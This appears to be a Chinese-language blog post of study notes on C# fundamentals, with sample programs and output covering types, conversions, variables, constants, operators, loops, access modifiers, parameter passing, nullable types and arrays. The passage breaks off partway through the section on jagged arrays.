    ​Decimal 不是浮点数据类型。Decimal 结构包含一个二进制整数值以及一个符号位和一个整数比例因子,该比例因子用于指定该值的小数部分。因此,在内存中,Decimal 数字的表示形式比浮点类型(Single 和 Double)更精确。Decimal 数据类型用于存储精确的小数值。与 Float 和 Double 等浮点数数据类型相比,Decimal 能够提供更高的精度,避免了浮点数计算中的舍入误差。

    ​如需得到一个类型或一个变量在特定平台上的准确尺寸,可以使用 sizeof 方法。表达式 sizeof(type) 产生以字节为单位存储对象或类型的存储尺寸。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    using System;

    namespace DataTypeApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Size of bool: {0}", sizeof(bool));
    Console.WriteLine("Size of byte: {0}", sizeof(byte));
    Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
    Console.WriteLine("Size of int: {0}", sizeof(int));
    Console.WriteLine("Size of float: {0}", sizeof(float));
    Console.WriteLine("Size of double: {0}", sizeof(double));
    Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    Size of bool: 1
    Size of byte: 1
    Size of sbyte: 1
    Size of int: 4
    Size of float: 4
    Size of double: 8
    Size of decimal: 16

    对象(Object)类型

    对象(Object)类型是 C# 通用类型系统(Common Type System - CTS)中所有数据类型的终极基类。Object 是 System.Object 类的别名。所以对象(Object)类型可以被分配任何其他类型(值类型、引用类型、预定义类型或用户自定义类型)的值。但是,在分配值之前,需要先进行类型转换。

    ​当一个值类型转换为对象类型时,则被称为装箱;另一方面,当一个对象类型转换为值类型时,则被称为拆箱

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 原始值类型
    int original = 10;

    // 装箱过程,将 int 类型装箱为 object 类型
    object boxed = original;

    // 拆箱过程,将 object 类型拆箱为 int 类型
    int unboxed = (int)boxed;

    Console.WriteLine($"原始值:{original}");
    Console.WriteLine($"拆箱后的值:{unboxed}");
    }
    }
    }
    1
    2
    原始值:10
    拆箱后的值:10

    动态(Dynamic)类型

    ​您可以存储任何类型的值在动态数据类型变量中。这些变量的类型检查是在运行时发生的。

    ​声明动态类型的语法:

    1
    dynamic d = 20;

    ​动态类型与对象类型相似,但是对象类型变量的类型检查是在编译时发生的,而动态类型变量的类型检查是在运行时发生的

    ​静态类型语言也被称为强类型语言。所谓强类型语言,通俗的讲,就是在编译过程中执行类型检查的语言。我们举个简单的例子,比如我们知道一个方法的返回类型,但是如果返回类型过于复杂,那么我推荐你使用 var。但是,当你明确知道返回类型时,或者返回的只是简单类型,那么我推荐你直接使用该数据类型来声明方法返回类型,就像平时我们经常用 stringintbool 等修饰符声明返回类型一样。

    var dynamic 关键字之间的主要区别在于绑定时间不一样:var 是早期绑定,dynamic 绑定则会在运行时进行。

    var 实际上是编译器抛给我们的语法糖,一旦被编译,编译器就会自动匹配 var 变量的实际类型,并用实际类型来替换该变量的声明,等同于我们在编码时使用了实际类型声明。而 dynamic 被编译后是一个 Object 类型,编译器编译时不会对 dynamic 进行类型检查。

    字符串(String)类型

    字符串(String)类型 允许您给变量分配任何字符串值。字符串(String)类型是 System.String 类的别名。它是从对象(Object)类型派生的。字符串(String)类型的值可以通过两种形式进行分配:引号@引号

    ​例如:

    1
    string str = "runoob.com";

    ​C# string 字符串的前面可以加 @(称作"逐字字符串")将转义字符\当作普通字符对待(类似于 python 里的原始字符串前缀 r?),比如:

    1
    string str = @"C:\Windows";

    ​等价于:

    1
    string str = "C:\\Windows";

    ​@ 字符串中可以任意换行,换行符及缩进空格都计算在字符串长度之内

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = @"<script type=""text/javascript"">
    <!--
    -->
    </script>";
    Console.WriteLine(str);
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    4
    <script type="text/javascript">
    <!--
    -->
    </script>

    ​用户自定义引用类型有:classinterfacedelegate。我们将在以后的章节中讨论这些类型。

    指针类型(Pointer types)

    ​指针类型变量存储另一种类型的内存地址。C# 中的指针与 C 或 C++ 中的指针有相同的功能。

    1
    type* identifier;

    C# 类型转换

    ​C# 中的类型转换可以分为两种:隐式类型转换显式类型转换(也称为强制类型转换)。

    隐式类型转换

    ​隐式转换是不需要编写代码来指定的转换,编译器会自动进行。

    ​隐式转换是指将一个较小范围的数据类型转换为较大范围的数据类型时(如,从 intlong,从 floatdouble 等),编译器会自动完成类型转换,这些转换是 C# 默认的以安全方式进行的转换,不会导致数据丢失

    1
    2
    byte b = 10;
    int i = b; // 隐式转换,不需要显式转换

    显式转换

    ​显式类型转换,即强制类型转换,需要程序员在代码中明确指定。

    ​显式转换是指将一个较大范围的数据类型转换为较小范围的数据类型时,或者将一个对象类型转换为另一个对象类型时,需要使用强制类型转换符号进行显示转换,强制转换(可能)会造成数据丢失

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    double a = 3.141592653589;
    float b = 3.141592653589f;

    Console.WriteLine(a + "");
    Console.WriteLine((float)a + "");
    Console.WriteLine(b);
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    3.141592653589
    3.141593
    3.141593

    C# 类型转换方法

    ​使用 System.Convert 类中的函数来进行类型转换。提供了一种安全的方式来执行类型转换,因为它们可以处理 null 值,如果转换不可能进行,则会抛出异常

    为什么 C# 没有 System.Convert.ToFloat()

    ​有。但它被称为 Convert.ToSingle()float 是类型 System.Single 的 C# 别名。

    ​“Single”是 BCL 中浮点数的名称。“float” 是 C# 提供的别名。有一个 Convert.ToSingle() 方法,就像有 Convert.ToInt32() 而不是 Convert.ToInt()


    float, int 这种类型只是 C# 的语法糖而已,在 .NET 框架中他们是 SingleInt32 等等。因此,Convert.ToFloat() 实际上是 Convert.ToSingle

    ​《CLR via C#》的作者推荐永远不要使用 int, short, float 等等,而是使用 Int32, Int16, Single 这些原生类型,这样在跨语言编程时才不会由于某种特定语言的特性而都不同类型产生迷惑。(说得好我还是接着用)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string a = "3.1415926535";
    float b = Convert.ToSingle(a);
    Single c = Convert.ToSingle(a);
    double d = Convert.ToDouble(a);

    Console.WriteLine(a);
    Console.WriteLine(b);
    Console.WriteLine(c);
    Console.WriteLine(d);
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    4
    3.1415926535
    3.141593
    3.141593
    3.1415926535

    .ToString() 可将特定类型转换为字符串,当然也可以使用 +""

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    using System;

    namespace TypeConversionApplication
    {
    class StringConversion
    {
    static void Main(string[] args)
    {
    int i = 75;
    float f = 53.005f;
    double d = 2345.7652;
    bool b = true;
    Console.WriteLine(i.ToString());
    Console.WriteLine(f.ToString());
    Console.WriteLine(d.ToString());
    Console.WriteLine(b.ToString());
    Console.ReadKey();
    }
    }
    }

    使用 Parse 方法

    ​Parse 方法用于将字符串转换为对应的数值类型,如果转换失败会抛出异常。

    1
    2
    string str = "123.45";
    double d = double.Parse(str);

    使用 TryParse 方法

    ​TryParse 方法类似于 Parse,但它不会抛出异常,而是返回一个布尔值指示转换是否成功。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = "123.45";
    double d;
    bool success = double.TryParse(str, out d);

    if (success)
    {
    Console.WriteLine("转换成功: " + d);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    int i;
    success = int.TryParse(str, out i);

    if (success)
    {
    Console.WriteLine("转换成功: " + i);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    Console.ReadKey();
    }
    }
    }
    1
    2
    转换成功: 123.45
    转换失败

    自定义类型转换

    ​C# 还允许你定义自定义类型转换操作,通过在类型中定义 implicitexplicit 关键字。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    using System;

    public class Fahrenheit
    {
    public double Degrees { get; set; }

    public Fahrenheit(double degrees)
    {
    Degrees = degrees;
    }

    // 隐式转换从华氏温度转为摄氏温度
    public static implicit operator Celsius(Fahrenheit f)
    {
    return new Celsius((f.Degrees - 32) / 1.8);
    }

    // 显式转换从摄氏温度转为华氏温度
    public static explicit operator Fahrenheit(Celsius c)
    {
    return new Fahrenheit(32 + c.Degrees * 1.8);
    }
    }

    public class Celsius
    {
    public double Degrees { get; set; }

    public Celsius(double degrees)
    {
    Degrees = degrees;
    }
    }

    public class Program
    {
    public static void Main()
    {
    Celsius c = new Celsius(37);
    Fahrenheit f = new Fahrenheit(98.6);
    Celsius c2 = f; // 使用隐式转换
    Fahrenheit f2 = (Fahrenheit)c; // 使用显式转换

    Console.WriteLine(c.Degrees + "°C");
    Console.WriteLine(f.Degrees + "°F");
    Console.WriteLine(c2.Degrees + "°C");
    Console.WriteLine(f2.Degrees + "°F");

    Console.ReadKey();
    }
    }

    implicit 定义隐式转换。

    explicit 定义显示转换。

    operator 关键字的主要作用是用来重载运算符的,还可以用于类或结构中类型的自定义转换。

    1
    2
    3
    4
    37°C
    98.6°F
    37°C
    98.6°F

    C# 变量

    ​一个变量只不过是一个供程序操作的存储区的名字

    C# 中的变量定义

    ​在 C# 中,变量的命名需要遵循一些规则:

    • 变量名可以包含字母、数字和下划线。
    • 变量名必须以字母或下划线开头。
    • 变量名区分大小写。
    • 避免使用 C# 的关键字作为变量名。

    C# 中的变量初始化

    ​正确地初始化变量是一个良好的编程习惯,否则有时程序会产生意想不到的结果。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    short a;
    int b;
    double c;

    /* 实际初始化 */
    a = 10;
    b = 20;
    c = a + b;
    Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
    Console.ReadLine();
    }
    }
    }
    1
    a = 10, b = 20, c = 30

    接受来自用户的值

    System 命名空间中的 Console 类提供了一个函数 ReadLine(),用于接收来自用户的输入,并把它存储到一个变量中。(类似 scanf()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    int num;
    num = Convert.ToInt32(Console.ReadLine());
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }

    C# 中的 Lvalues 和 Rvalues

    ​C# 中的两种表达式:

    1. lvalue:lvalue 表达式可以出现在赋值语句的左边或右边。
    2. rvalue:rvalue 表达式可以出现在赋值语句的右边,不能出现在赋值语句的左边。

    ​变量是 lvalue 的,所以可以出现在赋值语句的左边。数值是 rvalue 的,因此不能被赋值,不能出现在赋值语句的左边。下面是一个有效的语句:

    1
    int g = 20;

    下面是一个无效的语句,会产生编译时错误:

    1
    10 = 20;

    C# 变量作用域

    ​在 C# 中,变量的作用域定义了变量的可见性和生命周期。

    ​变量的作用域通常由花括号 {} 定义的代码块来确定

    方法参数作用域

    ​C# 是完全面向对象的语言,因此全局变量最高能只能放在类定义下:

    1
    2
    3
    4
    class MyClass
    {
    int memberVar = 30; // 成员变量,在整个类中可见
    }

    静态变量作用域

    static 静态变量是在类级别上声明的,但它们的作用域也受限于其定义的类。

    1
    2
    3
    4
    class MyClass
    {
    static int staticVar = 40; // 静态变量,在整个类中可见
    }

    循环变量作用域

    ​在 for 循环中声明的循环变量在循环体内可见。

    1
    2
    3
    4
    5
    for (int i = 0; i < 5; i++)
    {
    // i 在循环体内可见
    }
    // i 在这里不可见

    ​总体而言,变量的作用域有助于管理变量的可见性和生命周期,确保变量在其有效范围内使用,也有助于防止命名冲突。

    C# 常量

    ​常量可以被当作常规的变量,只是它们的值在定义后不能被修改。

    整数常量

    ​整数常量可以是十进制、八进制或十六进制的常量。

    前缀指定基数

    • 0x 或 0X 表示十六进制
    • 0 表示八进制
    • 没有前缀则表示十进制

    ​整数常量也可以有后缀,可以是 U 和 L 的组合,其中:

    • U 和 L 分别表示 unsigned 和 long。

      后缀可以是大写或者小写,多个后缀以任意顺序进行组合。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    var num = 0xFeeL;
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }
    1
    4078

    浮点常量

    ​一个浮点常量是由整数部分、小数点、小数部分和指数部分组成。您可以使用小数形式或者指数形式来表示浮点常量。

    ​原网页认为 314159E-5L 是合法的,然而测试的时候不合法,只有 314159E-5 合法。

    字符常量

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    namespace EscapeChar
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Hello\tWorld\n\n");
    Console.ReadLine();
    }
    }
    }

    ​之类的。

    字符串常量

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    string a = "hello, world";  // hello, world
    string b = @"hello, world"; // hello, world
    string c = "hello \t world"; // hello world
    string d = @"hello \t world"; // hello \t world
    string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
    string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
    string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
    string h = @"\\server\share\file.txt"; // \\server\share\file.txt
    string i = "one\r\ntwo\r\nthree";
    string j = @"one
    two
    three";

    ​回车(Carriage Return)和换行(Newline)是两个相关但不同的概念,它们通常一起使用来控制文本在显示或存储时的布局和格式。

    1. 回车 (\r)
      • 回车是一个控制字符,通常表示光标移动到当前行的开头,而不移动到下一行的开头。在早期的打字机和电传打字机中,回车操作会将打印头移回到纸带或打字机纸的左侧(或称为回车位置),这样打印机可以在新行开始时从左侧开始打印。
      • 在计算机领域中,回车通常表示 ASCII 字符中的值为 13(0x0D)。
    2. 换行 (\n)
      • 换行是另一个控制字符,用于指示应该在当前位置插入一个新行。它通常使光标移动到下一行的开头,以便从新的行开始写入文本。
      • 在计算机领域中,换行通常表示 ASCII 字符中的值为 10(0x0A)。

    ​在现代操作系统中,特别是在 Windows、Unix/Linux 和 macOS 等操作系统中,通常使用 \r\n 组合来表示文本文件中的换行符。Windows 使用 \r\n 作为标准换行符,而 Unix 和 Linux 系统通常只使用 \n。这种差异可以导致在跨平台处理文本文件时出现格式化问题。

    ​总结来说:

    • 回车 (\r):将光标移动到当前行的开头。
    • 换行 (\n):将光标移动到下一行的开头,并且可以包含在回车操作中一起使用,以实现在文本中的适当布局和格式。

    定义常量

    ​常量是使用 const 关键字来定义的。

    C# 运算符

    ​基本跟 C/C++ 差不多,记一点没接触过的。

    is 判断对象是否为某一类型。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    dynamic a = 3.14;
    Console.WriteLine(a is float);
    Console.ReadLine();
    }
    }
    }
    1
    False

    as 强制转换,即使转换失败也不会抛出异常(改为返回 null)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    using System;

    namespace AsOperatorExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    object obj = "This is a string";

    // Using 'as' operator to cast obj to string
    string str = obj as string;

    if (str != null)
    {
    Console.WriteLine("The object was successfully cast to a string.");
    Console.WriteLine(str);
    }
    else
    {
    Console.WriteLine("The object could not be cast to a string.");
    }

    // Attempting to cast obj to an incompatible type
    obj = 123;
    str = obj as string;

    if (str == null)
    {
    Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
    }
    }
    }
    }
    1
    2
    3
    The object was successfully cast to a string.
    This is a string
    The object could not be cast to a string because it is not a compatible type.

    typeof() 返回 class 的类型。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    using System;

    class Program
    {
    static void Main(string[] args)
    {
    Type type = typeof(string);
    Console.WriteLine(type.FullName);
    Console.ReadKey();
    }
    }
    1
    System.String

    C# 判断

    ​与 C/C++ 一致。

    C# 循环

    ​C# 定义一个数组:

    1
    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

    ​C# 定义一个列表:

    1
    2
    3
    4
    5
    6
    7
    // 创建一个字符串列表
    List<string> myStrings = new List<string>();

    // 向列表添加一些字符串元素
    myStrings.Add("Google");
    myStrings.Add("Runoob");
    myStrings.Add("Taobao");

    ​循环语法大都与 C/C++ 一致。试一下之前一直不太熟悉的 foreach

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    class ForEachTest
    {
    static void Main(string[] args)
    {
    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
    foreach (int element in fibarray)
    {
    System.Console.WriteLine(element);
    }
    System.Console.WriteLine();

    // 类似 foreach 循环
    for (int i = 0; i < fibarray.Length; i++)
    {
    System.Console.WriteLine(fibarray[i]);
    }
    System.Console.WriteLine();

    // 设置集合中元素的计算器
    int count = 0;
    foreach (int element in fibarray)
    {
    count += 1;
    System.Console.WriteLine("Element #{0}: {1}", count, element);
    }
    System.Console.WriteLine("Number of elements in the array: {0}", count);
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    0
    1
    1
    2
    3
    5
    8
    13

    0
    1
    1
    2
    3
    5
    8
    13

    Element #1: 0
    Element #2: 1
    Element #3: 1
    Element #4: 2
    Element #5: 3
    Element #6: 5
    Element #7: 8
    Element #8: 13
    Number of elements in the array: 8

    C# 封装

    webp

    ​一个 访问修饰符 定义了一个类成员的范围和可见性。C# 支持的访问修饰符如下所示:

    • public:所有对象都可以访问;
    • private:对象本身在对象内部可以访问;
    • protected:只有该类对象及其子类对象可以访问
      • 这样有助于实现继承
    • internal:同一个程序集的对象可以访问;
    • protected internal:访问限于当前程序集或派生自包含类的类型。

    ​比如说:一个人 A 为父类,他的儿子 B(A 的子类),妻子 C(在对象内部但不是子类),私生子 D(注:D 不在他家里,即是子类但不在对象内部)

    ​如果我们给 A 的事情增加修饰符:

    • public 事件,地球人都知道,全公开

    • protected 事件,A,B,D 知道(A 和他的所有儿子知道,妻子 C 不知道)

    • private 事件,只有 A 知道(隐私?心事?)

    • internal 事件,A,B,C 知道(A 家里人都知道,私生子 D 不知道)

    • protected internal 事件,A,B,C,D 都知道,其它人不知道

    C# 方法

    1
    2
    3
    4
    <Access Specifier> <Return Type> <Method Name>(Parameter List)
    {
    Method Body
    }
    • Access Specifier:访问修饰符,这个决定了变量或方法对于另一个类的可见性。
    • Return type:返回类型,一个方法可以返回一个值。返回类型是方法返回的值的数据类型。如果方法不返回任何值,则返回类型为 void
    • Method name:方法名称,是一个唯一的标识符,且是大小写敏感的。它不能与类中声明的其他标识符相同。
    • Parameter list:参数列表,使用圆括号括起来,该参数是用来传递和接收方法的数据。参数列表是指方法的参数类型、顺序和数量。参数是可选的,也就是说,一个方法可能不包含参数。
    • Method body:方法主体,包含了完成任务所需的指令集。

    按值传递参数

    ​这是参数传递的默认方式。在这种方式下,当调用一个方法时,会为每个值参数创建一个新的存储位置。

    ​实际参数的值会复制给形参,实参形参使用的是两个不同内存中的值。所以,当形参的值发生改变时,不会影响实参的值,从而保证了实参数据的安全。下面的实例演示了这个概念:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(int x, int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(a, b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();
    }
    }
    }

    ​当上面的代码被编译和执行时,它会产生下列结果:

    1
    2
    3
    4
    在交换之前,a 的值: 100
    在交换之前,b 的值: 200
    在交换之后,a 的值: 100
    在交换之后,b 的值: 200

    ​a 与 b 交换失败。

    按引用传递参数

    ​引用参数是一个对变量的内存位置的引用。当按引用传递参数时,与值参数不同的是,它不会为这些参数创建一个新的存储位置。引用参数表示与提供给方法的实际参数具有相同的内存位置。

    ​类似于 C/C++ 的指针。

    ​在 C# 中,使用 ref 关键字声明引用参数。下面的实例演示了这点:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(ref int x, ref int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(ref a, ref b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();

    }
    }
    }
    1
    2
    3
    4
    在交换之前,a 的值:100
    在交换之前,b 的值:200
    在交换之后,a 的值:200
    在交换之后,b 的值:100

    按输出传递参数

    ​return 语句可用于只从函数中返回一个值。但是,可以使用 输出参数 来从函数中返回多个值。输出参数会把方法输出的数据赋给自己,其他方面与引用参数相似。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    using System;

    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void getValue(out int x)
    {
    int temp = 5;
    x = temp;
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;

    Console.WriteLine("在方法调用之前,a 的值: {0}", a);

    /* 调用函数来获取值 */
    n.getValue(out a);

    Console.WriteLine("在方法调用之后,a 的值: {0}", a);
    Console.ReadLine();

    }
    }
    }
    1
    2
    在方法调用之前,a 的值: 100
    在方法调用之后,a 的值: 5

    C# 可空类型

    C# 可空类型(Nullable)

    ? 单问号用于对 int、double、bool 等无法直接赋值为 null 的数据类型进行 null 的赋值,意思是这个数据类型是 Nullable 类型的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {
    static void Main(string[] args)
    {
    int? num1 = null;
    int? num2 = 45;
    double? num3 = new double?();
    double? num4 = 3.14157;

    bool? boolval = new bool?();

    // 显示值

    Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
    num1, num2, num3, num4);
    Console.WriteLine("一个可空的布尔值: {0}", boolval);
    Console.ReadLine();

    }
    }
    }
    1
    2
    显示可空类型的值: , 45, , 3.14157
    一个可空的布尔值:

    Null 合并运算符( ?? )

    ​Null 合并运算符用于定义可空类型和引用类型的默认值。Null 合并运算符为类型转换定义了一个预设值,以防可空类型的值为 Null

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {

    static void Main(string[] args)
    {

    double? num1 = null;
    double? num2 = 3.14157;
    double num3;
    num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
    Console.WriteLine("num3 的值: {0}", num3);
    num3 = num2 ?? 5.34;
    Console.WriteLine("num3 的值: {0}", num3);
    Console.ReadLine();

    }
    }
    }
    1
    2
    num3 的值: 5.34
    num3 的值: 3.14157

    ?? 可以理解为三元运算符的简化形式:

    1
    2
    num3 = num1 ?? 5.34;
    num3 = (num1 == null) ? 5.34 : num1;

    C# 数组(Array)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    using System;
    namespace ArrayApplication
    {
    class MyArray
    {
    static void Main(string[] args)
    {
    int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
    int i, j;


    /* 初始化数组 n 中的元素 */
    for (i = 0; i < 10; i++)
    {
    n[i] = i + 100;
    }

    /* 输出每个数组元素的值 */
    for (j = 0; j < 10; j++)
    {
    Console.WriteLine("Element[{0}] = {1}", j, n[j]);
    }
    Console.ReadKey();
    }
    }
    }

    ​二维数组:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    using System;

    namespace TwoDimensionalArrayExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 定义一个3行4列的二维数组
    int[,] array = new int[3, 4];

    // 使用嵌套循环来初始化数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
    }
    }

    /* 也可直接初始化:
    int[,] array =
    {
    { 1, 2, 3, 4 },
    { 5, 6, 7, 8 },
    { 9, 10, 11, 12 }
    };
    */

    // 打印数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    Console.Write(array[i, j] + "\t");
    }
    Console.WriteLine();
    }
    }
    }
    }

    C# 多维数组

    ​C# 中二维数组的概念不同于 C/C++、java 等语言中的二维数组,C# 中的二维数组更像是一个矩阵:

    1
    2
    3
    4
    5
    int [,] a = new int [3,4] {
    {0, 1, 2, 3} , /* 初始化索引号为 0 的行 */
    {4, 5, 6, 7} , /* 初始化索引号为 1 的行 */
    {8, 9, 10, 11} /* 初始化索引号为 2 的行 */
    };

    ​这个如果是从其他语言转来学习 C# 可能会和交错数组的概念弄混。

    C# 交错数组

    ​在 C# 中,多维数组(multidimensional arrays)和交错数组(jagged arrays)是两种不同的数组形式,它们有几个重要的区别:

    1. 内存结构
      • 多维数组:多维数组在内存中是连续存储的。例如,一个二维数组 int[,] arr = new int[3, 4]; 在内存中会分配一个连续的块来存储 3 * 4 = 12 个整数。
      • 交错数组:交错数组实际上是数组的数组。它的每个元素都是一个独立的一维数组。这些一维数组在内存中并不一定是连续存储的,每个子数组都可以有不同的长度。例如,int[][] jaggedArray = new int[3][]; jaggedArray 中的每个元素都是一个 int[] 数组,每个 int[] 可以有不同的长度。
    2. 灵活性
      • 多维数组:多维数组在声明时就要确定每一维的大小,并且每一维的大小都是固定的。例如,int[,] arr = new int[3, 4]; 这里的 arr 有三行四列的结构,无法动态改变行或列的数量。
      • 交错数组:交错数组在声明后,每个子数组的长度可以独立设置,因此每个子数组的大小可以是不同的。这使得交错数组更加灵活,可以方便地处理不规则数据结构。
    3. 访问方式
      • 多维数组:访问多维数组的元素时,需要使用逗号分隔每个维度的索引。例如,int[,] arr = new int[3, 4]; int x = arr[1, 2]; 表示访问第二行第三列的元素。
      • 交错数组:访问交错数组的元素时,先通过第一个索引访问特定的子数组,然后再通过第二个索引访问该子数组中的元素。例如,int[][] jaggedArray = new int[3][]; int y = jaggedArray[1][2]; 表示访问第二个子数组的第三个元素。
    4. 用途和性能考虑
      • 多维数组:适合用于表示矩阵和类似的二维数据结构,因为它们提供了快速的访问和连续的内存布局,有利于性能优化。
      • 交错数组:适合处理不规则或动态大小的数据集,因为它们可以根据需要动态调整每个子数组的大小,灵活性更高。

    ​总结来说,多维数组和交错数组在内存结构、灵活性和访问方式上有明显的区别,选择哪种取决于具体的应用场景和数据结构的需求。

    • 交错数组是数组的数组

    • 交错数组是一维数组

    ​您可以声明一个带有 int 值的交错数组 scores,如下所示:

    1
    int [][] scores;

    ​声明一个数组不会在内存中创建数组。创建上面的数组:

    1
    2
    3
    4
    5
    int[][] scores = new int[5][];
    for (int i = 0; i < scores.Length; i++)
    {
    scores[i] = new int[4];
    }

    ​您可以初始化一个交错数组,如下所示:

    1
